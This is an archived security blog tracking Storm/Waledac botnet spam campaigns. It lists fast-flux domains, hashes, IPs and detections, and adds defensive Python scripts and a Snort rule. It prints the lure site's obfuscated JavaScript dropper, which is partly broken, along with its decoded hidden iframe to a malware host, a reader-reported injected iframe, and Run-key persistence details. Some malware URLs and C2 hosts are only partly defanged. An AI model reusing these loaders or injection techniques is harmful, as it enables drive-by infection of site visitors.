Wednesday, April 22, 2009

Waledac SMS Spy Trojan

The Storm/Waledac group has released a new trojan, this time looking to trick unsuspecting users into downloading an application that will monitor their significant other's SMS messages.

The email I received is:
From: "Nina Reyes"
To: REDACTED
Subject: Is your partner cheating on you?

Keep a spy eye on your Girlfriend's mobile hxxp://ytgga[.]eccellentesms[.]com/
(url obscured by me)
The site's page looks like this:

The link points to smsspy.exe or smstrap.exe, a Waledac variant. Mine had the following MD5 and SHA1 hashes:

083800074c6bad01e08b62f05d19ba66 smsspy.exe (MD5)
14c49220f43e2aa53af032a5205520f72ae9d8a4 smsspy.exe (SHA1)

DNS mining revealed the following fast flux domains in use by this same campaign:

Looks like this campaign has been around for a few days. I had disregarded the messages as suspect pharmacy/ED spam.

Are you going to generate a blocklist or search your netflow for signs of infection? You can start with the 200 or so IPs in this text file: waledac-4-21-2009.txt.
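As an added example (not part of the original post), here is a small Python script that does the kind of DNS mining, blocklist generation and netflow check described above, run over constructed records in the same "name. TTL IN A address" form; the domains, addresses and flow lines are made up.

```python
import re
from collections import defaultdict

# Constructed sample in the same "name. TTL IN A address" form as the mined
# records above; the names, addresses and flows are made up for this example.
SAMPLE_RECORDS = """\
adore-example.test. 0 IN A 192.0.2.42
cherish-example.test. 0 IN A 198.51.100.148
free-example.test. 0 IN A 192.0.2.42
mobile-example.test. 0 IN A 203.0.113.206
club-example.test. 0 IN A 203.0.113.206
corp-site.test. 86400 IN A 198.51.100.10
"""
SAMPLE_FLOWS = ["10.0.0.5,192.0.2.42", "10.0.0.7,198.51.100.10", "10.0.0.9,203.0.113.206"]

RECORD_RE = re.compile(r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+A\s+(?P<ip>\d+\.\d+\.\d+\.\d+)$")

def parse_records(text):
    """Parse zone-style A records into (name, ttl, ip); blank or malformed lines are skipped."""
    out = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            out.append((m.group("name").rstrip(".").lower(), int(m.group("ttl")), m.group("ip")))
    return out

def flux_candidates(records, max_ttl=0):
    """{ip: [domains]} for records with TTL <= max_ttl. Flux zones answer with
    TTL 0 so every lookup can be steered to a different drone."""
    by_ip = defaultdict(set)
    for name, ttl, ip in records:
        if ttl <= max_ttl:
            by_ip[ip].add(name)
    return {ip: sorted(names) for ip, names in by_ip.items()}

def shared_hosts(candidates, min_domains=2):
    """Drones fronting several zero-TTL names at once: the tie that links
    separate-looking domains into one campaign."""
    return {ip: d for ip, d in candidates.items() if len(d) >= min_domains}

def blocklist(candidates):
    """Sorted domain names, ready for an RPZ zone or proxy blocklist."""
    return sorted({d for names in candidates.values() for d in names})

def netflow_hits(candidates, flows):
    """Internal sources in 'src,dst' flow lines that talked to a candidate IP."""
    hot = set(candidates)
    return sorted({src for src, dst in (f.split(",") for f in flows) if dst in hot})
```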


Wednesday, December 31, 2008

Fast Flux Greeting Card Spam

Over the last several days my mail drops have been receiving a number of New Year and Christmas greeting card messages. They all appear to come from the same group:
Thomas just mailed to you a Christmas Postcard. Your card will be available at:
http://
newyearcardonline. com/?cardnum=e830b6884376991e6a6960068c0a
Blessings to you from the ecards-gallery.com
(spaces added to protect from accidental clicks)

When visiting the site, you're greeted with a JPEG image presented as a web link. Clicking anywhere on the JPEG prompts you to download postcard.exe (or ecard.exe).

(snapshot taken on 12/30/2008 by DISOG)

The domains used by this group include:

The fast flux domains are registered through paycenter.com.cn, out of China. Whois information on those domains is posted here. Paycenter.com.cn is known to host several phishing-related domains as well.

The site includes a one-line JavaScript:
var kMIkfQBFc6XycsDCpstUGgN2IlVDNTr=Array(63,20,3,46,23,58,41,45,44,0,0,0,0,0,0,0,21,14,
22,25,40,47,34,7,15,4,10,42,55,30,48,49,28,29,5,27,51,8,2,19,53,1,59,0,0,0,0,9,0,37,6,32,50,16,57,
36,12,61,62,39,35,13,31,18,52,60,33,54,26,24,43,38,17,11,56),FDThSyHWyj0O6kV=
"CdqN4Whd94DX4ShwGsPpx4ikJKDX9vqNJEqFy2PpJJ8d_G8FbkhTbZqF@EPXtVqO@
sqrRtQpPkhNuMuNhSQX_WhLn38dy2qrSw6FhHqXIlhNSV",C7Et1fOaTBFVqCmFAMyas8KCrCdo48iEUDJ
=0,XSyj5GuMgbyK7p=0,mIFBLKV3Me0q4pIPy3U2w=0,idxbfk_aWcRW7,opFx77WKnhL60Qr83=
FDThSyHWyj0O6kV.length,jQTi=1024; window.status=' '; for(var eMURVlsMortMi3PphMd=Math.ceil(opFx77WKnhL60Qr83/jQTi);eMURVlsMortMi3PphMd>0;eMURVlsMortMi3PphMd--){idxbfk_aWcRW7='';
for(var BLgQQyHi=Math.min(opFx77WKnhL60Qr83,jQTi);BLgQQyHi>0;BLgQQyHi--,opFx77WKnhL60Qr83--){C7Et1fOaTBFVqCmFAMyas8KCrCdo48iEUDJ|=(kMIkfQBFc6XycsDCpstUGgN2IlVDNTr[FDThSyHWyj0O6kV.charCodeAt(mIFBLKV3Me0q4pIPy3U2w++)-48])<>=8;XSyj5GuMgbyK7p-=2} else XSyj5GuMgbyK7p=6}document.write(idxbfk_aWcRW7);}

When decoded that says:
<iframe src="http:// seofon. net/gold /click.pnp?eb0h" style="display:none"></iframe>
At this time, that site returns a "Forbidden" page.

The binary postcard.exe has an MD5 hash of 31a8756b48576862e6312bdc063fa94b. It is packed with UPX; when unpacked, it has the MD5 hash 9f70846b6461cb881228bced7918f991.

VirusTotal reports that only 16 vendors detect this trojan:
File postcard.exe received on 12.31.2008 15:23:46 (CET)

Detections (vendor: result):
AntiVir: TR/Proxy.Gen
Authentium: W32/Downloader.F.gen!Eldorado
AVG: Downloader.Generic_r.CL
DrWeb: Trojan.DownLoad.26732
eSafe: Suspicious File
F-Prot: W32/Downloader.F.gen!Eldorado
F-Secure: Suspicious:W32/Malware!Gemini
Fortinet: suspicious
Ikarus: Trojan.Win32.Waledac
McAfee+Artemis: Generic!Artemis
Microsoft: Trojan:Win32/Waledac.A
NOD32: a variant of Win32/Waledac
Panda: Suspicious file
SecureWeb-Gateway: Trojan.Proxy.Gen
Sophos: Sus/Spy-B
Symantec: W32.Waledac

No detection: a-squared, AhnLab-V3, Avast, BitDefender, CAT-QuickHeal, ClamAV, Comodo, eTrust-Vet, Ewido, GData, K7AntiVirus, Kaspersky, McAfee, Norman, PCTools, Prevx1, Rising, Sunbelt, TheHacker, TrendMicro, VBA32, ViRobot, VirusBuster.

Additional information
MD5: 31a8756b48576862e6312bdc063fa94b
SHA1: b463b6d251a26a86a1f1472d6dbc0d953f4b4d5c
SHA256: 9fd8ae4b3bf5dcc239a3ea97e113683d1eb3ce564987109ccbeb2b2565c47d15
SHA512: f436e13c9b6886b5ea5367d906d10f3f6ad596b969f205f7ceab5bcc9a1f6044e5a08a2c74ab6e09071c86f8c8fc9fcb661920e34f0208fae663ad44f9a813d6

The binary contains a self signed certificate:
The certificate subject is /C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd. The binary posts encrypted data to http:// mirabellaclub.com/ with the Referer header set to the bare string "Mozilla", which is highly unusual and can be used as a Snort signature to identify infected hosts:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"2009 Holiday Greeting Spam - Unusual Referer String (Mozilla)"; flow:to_server,established; content:"Referer\: Mozilla"; nocase; classtype:trojan-activity; sid:999999;)
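An added example, not from the original post: the same check as the Snort rule, written in Python over constructed HTTP requests so it can be run offline against captured traffic. It generalizes the rule slightly by flagging any Referer that is not a URL rather than only the literal "Mozilla"; the host names are made up.

```python
import re

# Constructed requests: a normal browser fetch, then two shaped like the beacon
# described above (POST with the bare Referer "Mozilla"). Hosts are made up.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1\r\nHost: www.example.test\r\n"
    "Referer: http://www.example.test/\r\nUser-Agent: Mozilla/4.0\r\n\r\n",
    "POST / HTTP/1.1\r\nHost: c2-example.test\r\nReferer: Mozilla\r\n"
    "Content-Length: 64\r\n\r\n" + "A" * 64,
    "POST / HTTP/1.1\r\nHost: another-example.test\r\nreferer: mozilla\r\n\r\n",
]

URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

def parse_headers(raw):
    """Split a raw HTTP request into (request line, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def suspicious_referer(headers):
    """True when a Referer is present but is not a URL. Browsers always send a
    URL there; the rule's 'Referer: Mozilla' (nocase) is one instance of this."""
    ref = headers.get("referer")
    return ref is not None and not URL_RE.match(ref)

def flag_requests(requests):
    """[(request line, host, referer)] for every request matching the pattern."""
    hits = []
    for raw in requests:
        req_line, headers = parse_headers(raw)
        if suspicious_referer(headers):
            hits.append((req_line, headers.get("host", ""), headers["referer"]))
    return hits
```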
The binary creates a registry key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PromoReg" which is used to launch the binary from the saved location (in my case, I placed it on the desktop).

This file does not install into the system directories, and it relaunches on reboot. This means even users running with standard user privileges can become infected and join the botnet: if the binary is run as a normal user, the registry key is placed under "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\PromoReg" instead.

I started mapping the fast flux IPs and came up with about 150 unique addresses, which are available here.

Update 1: More information is available here:

http://www.symantec.com/norton/security_response/writeup.jsp?docid=2008-122308-1429-99&tabid=2
and here: http://isc.sans.org/diary.html?storyid=5557
and here: http://asert.arbornetworks.com/2008/12/another-holiday-another-e-card-run-waledec/

Update 2: Shadowserver has posted a great write up here:

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081231


Thursday, June 19, 2008

CME711's latest SE Spam



The Stormworm operators have recently updated their spam and web content. The webpage (capture to the right) is shown in its entirety. Users are then given the opportunity to download and run a malicious file, beijing.exe.

For the last couple of months the Storm domains have been less fast-fluxy: they change every 60 seconds instead of with every request. Perhaps this is because they are simply too small, or perhaps it's because too many people are hitting the DNS servers, effectively causing a denial of service.

Regardless, we've spotted the following domains in use:

biztech-co.cn, ratedhot.cn, fconnorlaw.cn, pacoast.cn, cadeaux-avenue.cn, likenewvideos.com, tellicolakerealty.cn, activeware.cn, grupogaleria.cn and polkerdesign.cn.


Please update your IDS accordingly.


Tuesday, October 16, 2007

0.0.0.0 - UPDATED.

Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamond Backs, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turnover of the active list from yesterday:
190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197
and the currently active list:
209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176
Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.


Saturday, September 08, 2007

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting at about 13:50 GMT, Randy V noticed the domains started rotating IPs less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1
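An added example that is not part of the original post: a Python analyzer for a resolver-observation log shaped like the timeline above. It collapses lookups into runs to measure how long each answer is held (per-request flux versus the slower rotation noted here) and flags parked 0.0.0.0 / 127.0.0.1 answers like those discussed in the 0.0.0.0 post above. The log and its TEST-NET addresses are constructed.

```python
import ipaddress
from datetime import datetime
from statistics import median

# Constructed resolver-observation log shaped like the timeline above: one lookup
# per line, UTC timestamp then the A answer. Addresses are TEST-NET values.
SAMPLE_LOG = """\
2007-09-08T13:49Z 192.0.2.10
2007-09-08T13:50Z 198.51.100.5
2007-09-08T13:57Z 198.51.100.5
2007-09-08T13:58Z 203.0.113.77
2007-09-08T14:03Z 203.0.113.77
2007-09-08T14:04Z 192.0.2.88
2007-09-08T14:20Z 192.0.2.88
2007-09-08T15:44Z 127.0.0.1
2007-09-08T15:50Z 127.0.0.1
"""

def parse_log(text):
    """[(datetime, ip)] in file order; blank lines are ignored."""
    obs = []
    for line in text.splitlines():
        if line.strip():
            ts, ip = line.split()
            obs.append((datetime.strptime(ts, "%Y-%m-%dT%H:%MZ"), ip))
    return obs

def collapse_runs(obs):
    """Merge consecutive identical answers: [(ip, first_seen, last_seen, dwell_minutes)]."""
    runs = []
    for ts, ip in obs:
        if runs and runs[-1][0] == ip:
            first = runs[-1][1]
            runs[-1] = (ip, first, ts, (ts - first).total_seconds() / 60)
        else:
            runs.append((ip, ts, ts, 0.0))
    return runs

def is_sentinel(ip):
    """0.0.0.0 / 127.0.0.1 style answers: the domain parked between campaigns."""
    addr = ipaddress.ip_address(ip)
    return addr.is_unspecified or addr.is_loopback

def summarize(runs):
    """Median dwell (minutes) of real answers plus any sentinel answers seen; a
    median near 0 means per-request flux, ~10 the slower rotation noted above."""
    real = [r for r in runs if not is_sentinel(r[0])]
    dwell = median(r[3] for r in real) if real else 0.0
    return {"median_dwell_min": dwell, "rotations": len(real),
            "sentinels": sorted({r[0] for r in runs if is_sentinel(r[0])})}
```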

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done), and it serves NFLTracker.exe (detected as Trojan.Peed.III). It's not using any of the XOR'd JavaScript or browser exploits; this page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'


Sunday, August 12, 2007

Storm/Peed Nameserver Update

DISOG researcher Randy Vaughn has identified a new wrinkle with the Stormworm Nameservers. 364 of the identified nameservers are now functioning as open resolvers.

The Storm gang may well be preparing poisoned name servers operating behind network perimeters. If they did that, they could use IPs that look local to the victim's network in order to mask the fact that infected users have had their network settings altered. If the machine owner was aware enough to examine their network settings, they might overlook the presence of an IP within their ISP's address space as a DNS IP. I know my initial reaction would be, "oh, Grandecom changed the DHCP-provided DNS IPs once again", rather than, "hey, that IP doesn't look right." Were I to check the listed, but compromised, name server I would more than likely only verify that CNN went to CNN and Apple.com went to Apple. I might not think to verify that mybank.com actually went to mybank. Please pay special attention to those SSL certificates! Storm, all by itself, could cause widely-dispersed financial loss on a large scale; I wouldn't put it past the Storm team to launch targeted phishing attacks in the near future.

Of course there are other, much scarier things these guys could be planning.

I am not a big fan of customer blocks, but I feel this case warrants blocking inbound port 53 (tcp/udp), and outbound port 25 (tcp) traffic immediately.

Jeff Kell reminds us that this could be quite a subtle attack vector weeks or months down the road, even if the machine was cleaned of all malware.


Saturday, August 11, 2007

Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over:
14376 unique Storm related binaries,
3118 unique Storm serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the Storm worm fast flux domains appears not to be privacy protected. I'm unclear whether this is a slip-up or a setup, but it's interesting!
Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327


Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The following code was injected into 4 of my websites:
------------------------------------
"<iframe src="http://kqfloat.xxxcom/ind.php" alt="BYDLOSHKA"
height="1" width="1"></iframe>"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, except one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google I found this news article.

Which tells me that the hack of my websites is part of this Storm Botnet.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.
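An added example (not code from the original post or its commenter): a Python scanner a site owner can run over their own HTML to find the hidden iframes used by both the decoded greeting-card script (style="display:none") and the code injected into the commenter's sites (a 1x1 frame). The sample page and host names are constructed.

```python
from html.parser import HTMLParser

# Constructed page: one legitimate embed, then the two hidden forms seen on this
# page, style="display:none" and a 1x1 frame. Hosts are made up.
SAMPLE_HTML = """\
<html><body><h1>Welcome</h1>
<iframe src="http://video-example.test/embed" width="640" height="360"></iframe>
<iframe src="http://redirect-example.test/gold/click.pnp?x" style="display:none"></iframe>
<iframe src="http://inject-example.test/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
</body></html>
"""

def _dim(value):
    """Width/height attribute ('1', '1px', '640') as an int; missing or odd values count as large."""
    if value is None:
        return 10**6
    digits = "".join(ch for ch in value if ch.isdigit())
    return int(digits) if digits else 10**6

class HiddenIframeFinder(HTMLParser):
    """Collect iframes a visitor would never see: boxes of 1x1 or smaller, or
    display:none / visibility:hidden / off-screen styles."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        sized = "width" in a or "height" in a
        tiny = sized and all(_dim(a.get(d)) <= 1 for d in ("width", "height"))
        hidden = any(s in style for s in ("display:none", "visibility:hidden", "left:-", "top:-"))
        if tiny or hidden:
            self.hits.append({"src": a.get("src", ""), "reason": "tiny" if tiny else "hidden"})

def find_hidden_iframes(html):
    """Run the finder over one HTML document and return its hits in document order."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    return finder.hits
```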
